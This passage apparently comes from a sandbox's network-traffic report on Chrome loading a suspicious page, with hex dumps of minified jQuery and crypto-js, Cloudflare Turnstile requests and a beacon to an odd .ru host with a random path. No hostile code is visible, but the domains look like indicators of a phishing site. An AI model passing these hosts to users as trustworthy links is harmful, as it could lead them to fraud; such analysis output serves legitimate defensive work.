                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                        2024-07-03 19:06:50 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.549752104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:50 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:50 UTC336INHTTP/1.1 302 Found
                                                        Date: Wed, 03 Jul 2024 19:06:50 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        cache-control: max-age=300, public
                                                        cross-origin-resource-policy: cross-origin
                                                        location: /turnstile/v0/g/d2a97f6b6ec9/api.js
                                                        Server: cloudflare
                                                        CF-RAY: 89d927b12a70c409-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.549753104.17.24.144433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:50 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:50 UTC961INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:50 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"61182885-40eb"
                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 13203
                                                        Expires: Mon, 23 Jun 2025 19:06:50 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fpy8ckDF0E6%2BZIlqTEajR53oVxTs2ShVXs%2BRCjPsnGcFK1tqh%2BX0wk9lB5toBcnJtRtkl4p2WGlx8RjtUvSg3jdvq%2Bw0eUaaXhmelH5p3qNnGa9A3DQqR64vbs4gmBSFPTW7E%2FWR"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 89d927b159cb42fd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:50 UTC408INData Raw: 33 39 39 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                        Data Ascii: 399c!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63
                                                        Data Ascii: eof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.c
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74
                                                        Data Ascii: e.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByt
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61
                                                        Data Ascii: typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e
                                                        Data Ascii: r(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49
                                                        Data Ascii: 0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79
                                                        Data Ascii: fer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e
                                                        Data Ascii: .charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMN
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74
                                                        Data Ascii: s(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=t
                                                        2024-07-03 19:06:50 UTC1369INData Raw: 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35
                                                        Data Ascii: 9]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.549754188.114.97.34433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:50 UTC417OUTGET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1
                                                        Host: zichd.6gniu68.ru
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:50 UTC602INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pBk8fL3yEOzkEf3m0D1iYGZTsfKnhUDZslUXTtE5GNn88vJ1TA1xsfW7GqgixkdSUp2ekA52DzlZ1mEjtJ7fBGEeFgVcO4XSoRzIcJxBOCpz8Z3KhQjBIH2%2Ba%2BwdEtACMFy"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d927b239e6729f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:50 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                        Data Ascii: 10
                                                        2024-07-03 19:06:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.549755104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:51 UTC649OUTGET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
